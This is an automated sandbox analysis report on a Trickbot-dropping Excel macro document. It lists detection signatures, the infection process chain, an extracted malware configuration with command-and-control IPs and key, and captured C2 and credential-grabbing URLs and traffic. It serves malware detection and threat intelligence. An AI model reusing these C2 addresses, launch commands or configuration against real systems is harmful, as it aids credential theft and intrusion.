Loading ...

Play interactive tourEdit tour

Analysis Report SecuriteInfo.com.Heur.31681.20936

Overview

General Information

Sample Name:SecuriteInfo.com.Heur.31681.20936 (renamed file extension from 20936 to xls)
Analysis ID:403507
MD5:6f7f78fa1fbe9be8fbe20812658c43aa
SHA1:d3f78f528a797c2e97af9f25e189bc43d98f2eae
SHA256:4d05d391297e3c4ec1bc4047bd3e104f37123c709797854053966ced43f492fb
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0 Trickbot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Trickbot
Yara detected Trickbot
Allocates memory in foreign processes
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Found evasive API chain (trying to detect sleep duration tampering with parallel thread)
Hijacks the control flow in another process
May check the online IP address of the machine
Office process drops PE file
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
Abnormal high CPU Usage
Adds / modifies Windows certificates
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to query network adapater information
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains embedded VBA macros
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2488 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 2824 cmdline: rundll32 ..\fndskfnds.dfm,StartW MD5: DD81D91FF3B0763C392422865C9AC12E)
      • rundll32.exe (PID: 824 cmdline: rundll32 ..\fndskfnds.dfm,StartW MD5: 51138BEEA3E2C21EC44D0932C71762A8)
        • wermgr.exe (PID: 1776 cmdline: C:\Windows\system32\wermgr.exe MD5: 41DF7355A5A907E2C1D7804EC028965D)
          • cmd.exe (PID: 3068 cmdline: C:\Windows\system32\cmd.exe MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
          • cmd.exe (PID: 1688 cmdline: C:\Windows\system32\cmd.exe MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
  • taskeng.exe (PID: 2460 cmdline: taskeng.exe {A9986821-F5E8-4178-8C7A-712EEA14850B} S-1-5-18:NT AUTHORITY\System:Service: MD5: 65EA57712340C09B1B0C427B4848AE05)
    • rundll32.exe (PID: 2860 cmdline: C:\Windows\system32\rundll32.EXE 'C:\Users\user\AppData\Roaming\iDownloadManager1882563550\kufndskfndszi.dwn',StartW MD5: DD81D91FF3B0763C392422865C9AC12E)
  • cleanup

Malware Configuration

Threatname: Trickbot

{"ver": "2000029", "gtag": "net9", "servs": ["103.66.72.217:443", "117.252.68.211:443", "103.124.173.35:443", "115.73.211.230:443", "117.54.250.246:443", "131.0.112.122:443", "69.109.35.254:20445", "43.17.158.63:36366", "130.180.24.227:44321", "131.168.228.35:19932", "185.31.222.247:49372", "151.187.13.249:46881", "190.186.36.209:40737", "42.139.161.213:11056", "23.95.165.4:64265", "189.169.15.32:42761", "125.6.227.80:58405", "217.159.190.123:8412", "47.106.66.231:10710", "46.136.156.92:5385"], "autorun": ["pwgrabb", "pwgrabc"], "ecc_key": "RUNTMzAAAAAL/ZqmMPBLaRfg1hPOtFJrZz2Zi2/EC4B3fiX8VnaOUVKndBr+jEqWc7mw4v3ADTiwp64K5QKe1LZ27jUZxL4bWjxARPo85hv72nuedeZhRQ+adQQ/gIsV869MycRzghc="}

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
SecuriteInfo.com.Heur.31681.xlsSUSP_EnableContent_String_GenDetects suspicious string that asks to enable active content in Office DocFlorian Roth
  • 0x16694:$e1: Enable Editing
  • 0x1661f:$e2: Enable Content
  • 0x163dd:$e3: Enable editing
  • 0x164b0:$e4: Enable content

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.2105353530.0000000002460000.00000040.00000001.sdmpJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security
    00000004.00000002.2104607915.0000000000290000.00000040.00000001.sdmpJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security
      00000004.00000002.2104542682.00000000001D0000.00000004.00000001.sdmpJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security
        Process Memory Space: wermgr.exe PID: 1776JoeSecurity_Trickbot_1Yara detected TrickbotJoe Security

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          4.2.rundll32.exe.1d0000.1.raw.unpackJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security
            4.2.rundll32.exe.2460000.8.raw.unpackJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security
              4.2.rundll32.exe.2460000.8.unpackJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security

                Sigma Overview

                No Sigma rule has matched

                Signature Overview

                Click to jump to signature section

                Show All Signature Results

                AV Detection:

                barindex
                Found malware configurationShow sources
                Source: 00000004.00000002.2104607915.0000000000290000.00000040.00000001.sdmpMalware Configuration Extractor: Trickbot {"ver": "2000029", "gtag": "net9", "servs": ["103.66.72.217:443", "117.252.68.211:443", "103.124.173.35:443", "115.73.211.230:443", "117.54.250.246:443", "131.0.112.122:443", "69.109.35.254:20445", "43.17.158.63:36366", "130.180.24.227:44321", "131.168.228.35:19932", "185.31.222.247:49372", "151.187.13.249:46881", "190.186.36.209:40737", "42.139.161.213:11056", "23.95.165.4:64265", "189.169.15.32:42761", "125.6.227.80:58405", "217.159.190.123:8412", "47.106.66.231:10710", "46.136.156.92:5385"], "autorun": ["pwgrabb", "pwgrabc"], "ecc_key": "RUNTMzAAAAAL/ZqmMPBLaRfg1hPOtFJrZz2Zi2/EC4B3fiX8VnaOUVKndBr+jEqWc7mw4v3ADTiwp64K5QKe1LZ27jUZxL4bWjxARPo85hv72nuedeZhRQ+adQQ/gIsV869MycRzghc="}
                Multi AV Scanner detection for dropped fileShow sources
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\netmouser[1].dllReversingLabs: Detection: 32%
                Source: C:\Users\user\fndskfnds.dfmReversingLabs: Detection: 32%
                Multi AV Scanner detection for submitted fileShow sources
                Source: SecuriteInfo.com.Heur.31681.xlsReversingLabs: Detection: 12%
                Yara detected TrickbotShow sources
                Source: Yara matchFile source: Process Memory Space: wermgr.exe PID: 1776, type: MEMORY
                Source: C:\Windows\System32\wermgr.exeCode function: 5_2_00068300 CryptAcquireContextW,
                Source: C:\Windows\System32\cmd.exeCode function: 9_2_0000000180083634 CryptUnprotectData,
                Source: unknownHTTPS traffic detected: 117.54.250.246:443 -> 192.168.2.22:49167 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 117.54.250.246:443 -> 192.168.2.22:49169 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 117.54.250.246:443 -> 192.168.2.22:49171 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 117.54.250.246:443 -> 192.168.2.22:49173 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 117.54.250.246:443 -> 192.168.2.22:49174 version: TLS 1.0
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                Source: unknownHTTPS traffic detected: 144.208.70.30:443 -> 192.168.2.22:49165 version: TLS 1.2
                Source: C:\Windows\System32\wermgr.exeCode function: 5_2_00062E60 FindFirstFileW,FindNextFileW,
                Source: C:\Windows\System32\wermgr.exeCode function: 5_2_00063B00 FindFirstFileW,

                Software Vulnerabilities:

                barindex
                Document exploit detected (creates forbidden files)Show sources
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\netmouser[1].dllJump to behavior
                Document exploit detected (drops PE files)Show sources
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: netmouser[1].dll.0.drJump to dropped file
                Document exploit detected (UrlDownloadToFile)Show sources
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
                Document exploit detected (process start blacklist hit)Show sources
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then movzx edx, word ptr [eax]
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then movzx ecx, word ptr [eax+02h]
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec ecx
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then mov ebx, edx
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then mov esi, esi
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then inc esp
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then mov esi, esi
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then mov esi, esi
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then mov esi, esi
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then mov esi, esi
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then mov esi, esi
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then call 000619E0h
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then inc esp
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then inc ecx
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then mov esi, esi
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then inc esp
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then cmp dword ptr [eax], ecx
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec edi
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then inc esp
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then inc ebp
                Source: global trafficDNS query: name: deluciaspizza.com
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 144.208.70.30:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 144.208.70.30:443

                Networking:

                barindex
                Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                Source: TrafficSnort IDS: 2404318 ET CNC Feodo Tracker Reported CnC Server TCP group 10 192.168.2.22:49170 -> 188.18.7.133:447
                May check the online IP address of the machineShow sources
                Source: C:\Windows\System32\wermgr.exeDNS query: name: api.ipify.org
                Source: C:\Windows\System32\wermgr.exeDNS query: name: api.ipify.org
                Source: C:\Windows\System32\wermgr.exeDNS query: name: api.ipify.org
                Source: C:\Windows\System32\wermgr.exeDNS query: name: api.ipify.org
                Source: C:\Windows\System32\wermgr.exeDNS query: name: api.ipify.org
                Source: C:\Windows\System32\wermgr.exeDNS query: name: api.ipify.org
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.18.7.133:447
                Source: Joe Sandbox ViewIP Address: 103.102.220.50 103.102.220.50
                Source: Joe Sandbox ViewASN Name: ROSTELECOM-ASRU ROSTELECOM-ASRU
                Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
                Source: Joe Sandbox ViewJA3 fingerprint: 8c4a22651d328568ec66382a84fc505f
                Source: global trafficHTTP traffic detected: POST /net9/035347_W617601.17B7997589EBB97D55BFB73DD1C2B3BB/83/ HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=---------GRLZGARVGZREFNBNConnection: CloseUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.102.220.50:443Content-Length: 282Cache-Control: no-cache
                Source: unknownHTTPS traffic detected: 117.54.250.246:443 -> 192.168.2.22:49167 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 117.54.250.246:443 -> 192.168.2.22:49169 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 117.54.250.246:443 -> 192.168.2.22:49171 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 117.54.250.246:443 -> 192.168.2.22:49173 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 117.54.250.246:443 -> 192.168.2.22:49174 version: TLS 1.0
                Source: unknownTCP traffic detected without corresponding DNS query: 117.54.250.246
                Source: unknownTCP traffic detected without corresponding DNS query: 117.54.250.246
                Source: unknownTCP traffic detected without corresponding DNS query: 117.54.250.246
                Source: unknownTCP traffic detected without corresponding DNS query: 117.54.250.246
                Source: unknownTCP traffic detected without corresponding DNS query: 117.54.250.246
                Source: unknownTCP traffic detected without corresponding DNS query: 117.54.250.246
                Source: unknownTCP traffic detected without corresponding DNS query: 117.54.250.246
                Source: unknownTCP traffic detected without corresponding DNS query: 117.54.250.246
                Source: unknownTCP traffic detected without corresponding DNS query: 117.54.250.246
                Source: unknownTCP traffic detected without corresponding DNS query: 117.54.250.246
                Source: unknownTCP traffic detected without corresponding DNS query: 117.54.250.246
                Source: unknownTCP traffic detected without corresponding DNS query: 117.54.250.246
                Source: unknownTCP traffic detected without corresponding DNS query: 117.54.250.246
                Source: unknownTCP traffic detected without corresponding DNS query: 117.54.250.246
                Source: unknownTCP traffic detected without corresponding DNS query: 117.54.250.246
                Source: unknownTCP traffic detected without corresponding DNS query: 117.54.250.246
                Source: unknownTCP traffic detected without corresponding DNS query: 117.54.250.246
                Source: unknownTCP traffic detected without corresponding DNS query: 117.54.250.246
                Source: unknownTCP traffic detected without corresponding DNS query: 117.54.250.246
                Source: unknownTCP traffic detected without corresponding DNS query: 117.54.250.246
                Source: unknownTCP traffic detected without corresponding DNS query: 188.18.7.133
                Source: unknownTCP traffic detected without corresponding DNS query: 117.54.250.246
                Source: unknownTCP traffic detected without corresponding DNS query: 188.18.7.133
                Source: unknownTCP traffic detected without corresponding DNS query: 188.18.7.133
                Source: unknownTCP traffic detected without corresponding DNS query: 188.18.7.133
                Source: unknownTCP traffic detected without corresponding DNS query: 188.18.7.133
                Source: unknownTCP traffic detected without corresponding DNS query: 188.18.7.133
                Source: unknownTCP traffic detected without corresponding DNS query: 188.18.7.133
                Source: unknownTCP traffic detected without corresponding DNS query: 188.18.7.133
                Source: unknownTCP traffic detected without corresponding DNS query: 188.18.7.133
                Source: unknownTCP traffic detected without corresponding DNS query: 188.18.7.133
                Source: unknownTCP traffic detected without corresponding DNS query: 188.18.7.133
                Source: unknownTCP traffic detected without corresponding DNS query: 188.18.7.133
                Source: unknownTCP traffic detected without corresponding DNS query: 188.18.7.133
                Source: unknownTCP traffic detected without corresponding DNS query: 188.18.7.133
                Source: unknownTCP traffic detected without corresponding DNS query: 188.18.7.133
                Source: unknownTCP traffic detected without corresponding DNS query: 188.18.7.133
                Source: unknownTCP traffic detected without corresponding DNS query: 188.18.7.133
                Source: unknownTCP traffic detected without corresponding DNS query: 188.18.7.133
                Source: unknownTCP traffic detected without corresponding DNS query: 188.18.7.133
                Source: unknownTCP traffic detected without corresponding DNS query: 188.18.7.133
                Source: unknownTCP traffic detected without corresponding DNS query: 188.18.7.133
                Source: unknownTCP traffic detected without corresponding DNS query: 188.18.7.133
                Source: unknownTCP traffic detected without corresponding DNS query: 188.18.7.133
                Source: unknownTCP traffic detected without corresponding DNS query: 188.18.7.133
                Source: unknownTCP traffic detected without corresponding DNS query: 188.18.7.133
                Source: unknownTCP traffic detected without corresponding DNS query: 188.18.7.133
                Source: unknownTCP traffic detected without corresponding DNS query: 188.18.7.133
                Source: unknownTCP traffic detected without corresponding DNS query: 188.18.7.133
                Source: unknownTCP traffic detected without corresponding DNS query: 188.18.7.133
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7EF8415A.emfJump to behavior
                Source: global trafficHTTP traffic detected: GET /?format=text HTTP/1.1Connection: Keep-AliveUser-Agent: curl/7.74.0Host: api.ipify.org
                Source: rundll32.exe, 00000003.00000002.2105813487.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2104688226.0000000000800000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2368153807.0000000000780000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
                Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                Source: unknownDNS traffic detected: queries for: deluciaspizza.com
                Source: unknownHTTP traffic detected: POST /net9/035347_W617601.17B7997589EBB97D55BFB73DD1C2B3BB/83/ HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=---------GRLZGARVGZREFNBNConnection: CloseUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.102.220.50:443Content-Length: 282Cache-Control: no-cache
                Source: wermgr.exe, 00000005.00000002.2374904504.0000000032C30000.00000004.00000040.sdmpString found in binary or memory: http://103.102.220.50:443
                Source: wermgr.exe, 00000005.00000002.2374904504.0000000032C30000.00000004.00000040.sdmpString found in binary or memory: http://103.102.220.50:443Edge
                Source: wermgr.exe, 00000005.00000002.2374629363.0000000031844000.00000004.00000040.sdmpString found in binary or memory: http://103.102.220.50:443W6
                Source: wermgr.exe, 00000005.00000003.2180328107.0000000031844000.00000004.00000040.sdmpString found in binary or memory: http://103.102.220.50:443X6
                Source: wermgr.exe, 00000005.00000003.2169013545.0000000031E3E000.00000004.00000040.sdmpString found in binary or memory: http://115.241.244.185:443
                Source: wermgr.exe, 00000005.00000003.2169013545.0000000031E3E000.00000004.00000040.sdmpString found in binary or memory: http://177.84.63.252:443
                Source: wermgr.exe, 00000005.00000003.2169013545.0000000031E3E000.00000004.00000040.sdmpString found in binary or memory: http://185.119.120.213:443
                Source: wermgr.exe, 00000005.00000003.2169013545.0000000031E3E000.00000004.00000040.sdmpString found in binary or memory: http://189.195.96.238:443
                Source: wermgr.exe, 00000005.00000003.2169013545.0000000031E3E000.00000004.00000040.sdmpString found in binary or memory: http://190.89.3.117:443
                Source: wermgr.exe, 00000005.00000003.2169013545.0000000031E3E000.00000004.00000040.sdmpString found in binary or memory: http://36.95.27.243:443
                Source: wermgr.exe, 00000005.00000003.2169013545.0000000031E3E000.00000004.00000040.sdmpString found in binary or memory: http://5.202.120.150:443
                Source: wermgr.exe, 00000005.00000003.2169013545.0000000031E3E000.00000004.00000040.sdmpString found in binary or memory: http://83.220.115.230:443
                Source: wermgr.exe, 00000005.00000002.2370271549.0000000000320000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.c
                Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en&
                Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabl
                Source: rundll32.exe, 00000003.00000002.2105813487.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2104688226.0000000000800000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2368153807.0000000000780000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
                Source: rundll32.exe, 00000003.00000002.2105813487.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2104688226.0000000000800000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2368153807.0000000000780000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
                Source: rundll32.exe, 00000003.00000002.2106026535.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2104880934.00000000009E7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2368386646.0000000000967000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
                Source: rundll32.exe, 00000003.00000002.2106026535.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2104880934.00000000009E7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2368386646.0000000000967000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
                Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.entrust.net03
                Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                Source: wermgr.exe, 00000005.00000002.2376017497.0000000033720000.00000002.00000001.sdmp, taskeng.exe, 00000007.00000002.2368215983.00000000008C0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                Source: rundll32.exe, 00000003.00000002.2106026535.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2104880934.00000000009E7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2368386646.0000000000967000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
                Source: rundll32.exe, 00000003.00000002.2106026535.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2104880934.00000000009E7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2368386646.0000000000967000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
                Source: wermgr.exe, 00000005.00000002.2376017497.0000000033720000.00000002.00000001.sdmp, taskeng.exe, 00000007.00000002.2368215983.00000000008C0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
                Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                Source: rundll32.exe, 00000003.00000002.2105813487.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2104688226.0000000000800000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2368153807.0000000000780000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
                Source: rundll32.exe, 00000003.00000002.2106026535.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2104880934.00000000009E7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2368386646.0000000000967000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
                Source: rundll32.exe, 00000003.00000002.2105813487.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2104688226.0000000000800000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2368153807.0000000000780000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
                Source: rundll32.exe, 00000008.00000002.2368153807.0000000000780000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
                Source: wermgr.exe, 00000005.00000002.2375672021.000000003336F000.00000004.00000001.sdmpString found in binary or memory: https://117.54.250.246/net9/035347_W617601.17B7997589EBB97D55BFB73DD1C2B3BB/10/62/DTJZZVZHXNDTX/1/
                Source: wermgr.exe, 00000005.00000002.2370271549.0000000000320000.00000004.00000020.sdmpString found in binary or memory: https://117.54.250.246/net9/035347_W617601.17B7997589EBB97D55BFB73DD1C2B3BB/10/62/DTJZZVZHXNDTX/1/in
                Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmpString found in binary or memory: https://117.54.250.246/net9/035347_W617601.17B7997589EBB97D55BFB73DD1C2B3BB/14/NAT%20status/client%2
                Source: wermgr.exe, 00000005.00000002.2375672021.000000003336F000.00000004.00000001.sdmpString found in binary or memory: https://117.54.250.246/net9/035347_W617601.17B7997589EBB97D55BFB73DD1C2B3BB/5/dpost/
                Source: wermgr.exe, 00000005.00000002.2375741544.0000000033395000.00000004.00000001.sdmp, wermgr.exe, 00000005.00000002.2375672021.000000003336F000.00000004.00000001.sdmpString found in binary or memory: https://117.54.250.246/net9/035347_W617601.17B7997589EBB97D55BFB73DD1C2B3BB/64/pwgrabb/DEBG//
                Source: wermgr.exe, 00000005.00000002.2375793924.000000003339B000.00000004.00000001.sdmpString found in binary or memory: https://117.54.250.246/net9/035347_W617601.17B7997589EBB97D55BFB73DD1C2B3BB/64/pwgrabb/DPST//
                Source: wermgr.exe, 00000005.00000002.2375672021.000000003336F000.00000004.00000001.sdmpString found in binary or memory: https://117.54.250.246/net9/035347_W617601.17B7997589EBB97D55BFB73DD1C2B3BB/64/pwgrabb/VERS//
                Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmpString found in binary or memory: https://188.18.7.133:447/net9/035347_W617601.17B7997589EBB97D55BFB73DD1C2B3BB/5/pwgrabb64/k
                Source: wermgr.exe, 00000005.00000002.2375672021.000000003336F000.00000004.00000001.sdmpString found in binary or memory: https://188.18.7.133:447/net9/035347_W617601.17B7997589EBB97D55BFB73DD1C2B3BB/5/pwgrabc64/O
                Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49169
